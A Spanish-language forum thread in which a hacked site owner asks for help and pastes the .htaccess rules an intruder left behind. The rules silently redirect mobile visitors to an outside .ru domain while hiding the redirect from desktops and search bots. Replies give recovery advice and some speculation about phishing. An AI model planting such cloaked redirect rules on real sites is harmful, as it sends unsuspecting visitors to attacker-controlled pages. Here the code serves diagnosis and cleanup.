Me han Hackeado mi pagina en Mobiles

Hola a todos, tengo una serie de sitios web en mi servidor, pero desde ayer he sido victima de un Hacker que me bloqueo mis paginas en Navegadores Mobiles, Pero en pc no. no se que hacer, he borrado los archivos que me inyectaron pero el problema sigue. Alguna recomendacion?

pasa el LINK de tu web, restauraste todas las paginas?? o solo las que creiste que estaban tocadas, recuerda que pudo haber tocado el HTACCESS, los archivos CGI, y si tuvo acceso a tu cuenta de HOSTING; pue practicamente pudo dejar scripts e cronJob y otros

Me dejo esto en el htacces. Lo borrè pero el problema persiste

RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} opera\ mini [NC,OR]
RewriteCond %{HTTP_USER_AGENT} blackberry [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iphone [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (pre\/|palm\ os|palm|hiptop|avantgo|plucker|xiino|blazer|elaine ) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (iris|3g_t|windows\ ce|opera\ mobi|windows\ ce;\ smartphone;|windows\ ce;\ iemobile) [NC,OR]
RewriteCond %{HTTP:Accept} (text\/vnd\.wap\.wml|application\/vnd\.wap\.xhtml\+xml) [NC,OR]
RewriteCond %{HTTP:Profile} .+ [NC,OR]
RewriteCond %{HTTP:Wap-Profile} .+ [NC,OR]
RewriteCond %{HTTP:x-wap-profile} .+ [NC,OR]
RewriteCond %{HTTP:x-operamini-phone-ua} .+ [NC,OR]
RewriteCond %{HTTP:x-wap-profile-diff} .+ [NC]
RewriteCond %{QUERY_STRING} !noredirect [NC]
RewriteCond %{HTTP_USER_AGENT} !^(Mozilla\/5\.0\ \(Linux;\ U;\ Android\ 2\.2;\ en-us;\ Nexus\ One\ Build/FRF91\)\ AppleWebKit\/533\.1\ \(KHTML,\ like\ Gecko\)\ Version\/4\.0\ Mobile\ Safari\/533\.1\ offline)$ [NC]
RewriteCond %{HTTP_USER_AGENT} !(windows\.nt|bsd|x11|unix|macos|macintosh|playsta tion|google|yandex|bot|libwww|msn|america|avant|do wnload|fdm|maui|webmoney|windows-media-player) [NC]
RewriteCond %{REQUEST_URI} !^/\.well-known/acme-challenge/[0-9a-zA-Z_-]+$
RewriteCond %{REQUEST_URI} !^/\.well-known/cpanel-dcv/[0-9a-zA-Z_-]+$
RewriteCond %{REQUEST_URI} !^/\.well-known/pki-validation/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule ^(.*)$ http://wwwtype.ru [L,R=302]

RewriteEngine on
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?gameday.de.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?play-texas-holdem.gameday.de.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?forever.kz.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?craps.forever.kz.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?roulette-online.forever.kz.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?play-poker.forever.kz.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?onlinecasino.forever.kz.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?texashold-em.freeservers.com.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?playonline.inn7winter.com.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?poker-new.com.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?available-poker.com.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?free-poker.available-poker.com.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?texasholdem.prv.pl.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?prv.pl.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?homestead.com.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?texaspoker.homestead.com.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?t-e-x-a-s-poker.com.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?texas-poker.olo.cc.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?holdem-poker.servertown.com.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?online-poker.played.by.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?empire-poker.black-poker.com.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?black-poker.com.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?free.fr.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?pc800cdf.free.fr.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?free-poker.standard-poker.com.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?cameralover.net.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?golfshoot.com.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?bitlocker.net.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?bayfronthomes.net.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?cafexml.com.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?turniptruck.com.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?trojan-horse.co.uk.*$ [NC]
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/\.well-known/acme-challenge/[0-9a-zA-Z_-]+$
RewriteCond %{REQUEST_URI} !^/\.well-known/pki-validation/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteCond %{REQUEST_URI} !^/\.well-known/cpanel-dcv/[0-9a-zA-Z_-]+$
RewriteRule .* - [F,L]
RewriteCond %{REMOTE_HOST} adm-muenchen\.de [NC,OR]
RewriteCond %{REMOTE_HOST} cyveillance\.com [NC,OR]
RewriteCond %{REMOTE_HOST} lightspeedsystems\.com [NC,OR]
RewriteCond %{REMOTE_HOST} pea016-29980-net-adsl-01\.altohiway\.com [NC,OR]
RewriteCond %{REMOTE_HOST} smartservercontrol\.com [NC,OR]
RewriteCond %{REMOTE_HOST} syntryx\.com [NC,OR]
RewriteCond %{REMOTE_HOST} proxad\.net [NC]
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/\.well-known/acme-challenge/[0-9a-zA-Z_-]+$
RewriteCond %{REQUEST_URI} !^/\.well-known/pki-validation/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteCond %{REQUEST_URI} !^/\.well-known/cpanel-dcv/[0-9a-zA-Z_-]+$
RewriteRule ^.*$ - [F]
RewriteCond %{HTTP_USER_AGENT} ^$ [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^BlackWidow [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Bot\ mailto:[email protected] [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^ChinaClaw [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Custo [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^DISCo [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Download\ Demon [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^eCatch [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^EirGrabber [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailSiphon [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailWolf [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Express\ WebPictures [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^ExtractorPro [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^EyeNetIE [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^FlashGet [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^GetRight [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^GetWeb! [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Go!Zilla [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Go-Ahead-Got-It [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^GrabNet [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Grafula [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^HMView [NC,OR]
RewriteCond %{HTTP_USER_AGENT} HTTrack [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Image\ Stripper [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Image\ Sucker [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Indy\ Library [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^InterGET [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Internet\ Ninja [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Java [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^JetCar [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^JOC\ Web\ Spider [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^larbin [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^LeechFTP [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^lwp:: [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^lwp- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Mass\ Downloader [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^MIDown\ tool [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Mister\ PiX [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Navroad [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^NearSite [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^NetAnts [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^NetSpider [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Net\ Vampire [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^NetZIP [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Octopus [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Offline\ Explorer [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Offline\ Navigator [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^PageGrabber [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Papa\ Foto [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^pavuk [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^pcBrowser [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^RealDownload [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^ReGet [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^SiteSnagger [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^SmartDownload [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Schmozilla [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^SuperBot [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^SuperHTTP [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Surfbot [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^tAkeOut [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Teleport\ Pro [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^VoidEYE [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Image\ Collector [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Sucker [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^WebAuto [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^WebCopier [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^webcollage [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^WebFetch [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^WebGo\ IS [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^WebLeacher [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^WebReaper [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^WebSauger [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Website\ eXtractor [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Website\ Quester [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^WebStripper [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^WebWhacker [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^WebZIP [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Wget [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Widow [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^WWWOFFLE [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Xaldon\ WebSpider [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Zeuse [NC]
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/\.well-known/acme-challenge/[0-9a-zA-Z_-]+$
RewriteCond %{REQUEST_URI} !^/\.well-known/pki-validation/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteCond %{REQUEST_URI} !^/\.well-known/cpanel-dcv/[0-9a-zA-Z_-]+$
RewriteRule ^.*$ - [F]

Me preocupa esta parte. que me habla del Cpanel

RewriteCond %{REQUEST_URI} !^/\.well-known/cpanel-dcv/[0-9a-zA-Z_-]+$
RewriteRule ^.*$ - [F] Qué hago?

primero lo primero, cambia los password de tu cuenta EMAIL, que este asociado a tu CPANEL, cambia las contraseñas del CPANEL, informa al soporte tecnico sobre ello, puede que sea algun bug en el CPANEL, si es eso seguramente lo actualizara, quita todos los archivos HTACCESS, o restaura un backup que hayas tenido, para fixear los archivos tocados, y tambien en tu PC fijate puede que tengas algun Keyloger o troyano, fiajte si no tienes procesos raros, etc.

Amigo ahora me sale a cada rato este error y se me caen las paginas

Can't connect to local MySQL server through socket '/var/lib/mysql/mysql.sock' (2)

Que debo hacer. Que desspero, mis clientes se estan quejando de las caidas del servicio constantes

lo mejor es que te contactes con el servicio al cliente, por lo que vi en el HTACCESS es que te hicieron pishing de tu cuenta, de hosting, suplantaron el CPANEL para que pongas tus datos reales, con eso tiene acceso a todo desde tu base de datos y tus archivos, por eso lo primero que tenias que hacer , era contactarte, comentarles el problema, y restaurar el backup, ahora contactte con ellos y diles que te cambien los accesos y que borren los HTACESS de tu web, sino si son hackers malos, te van a borrar toda tu base de datos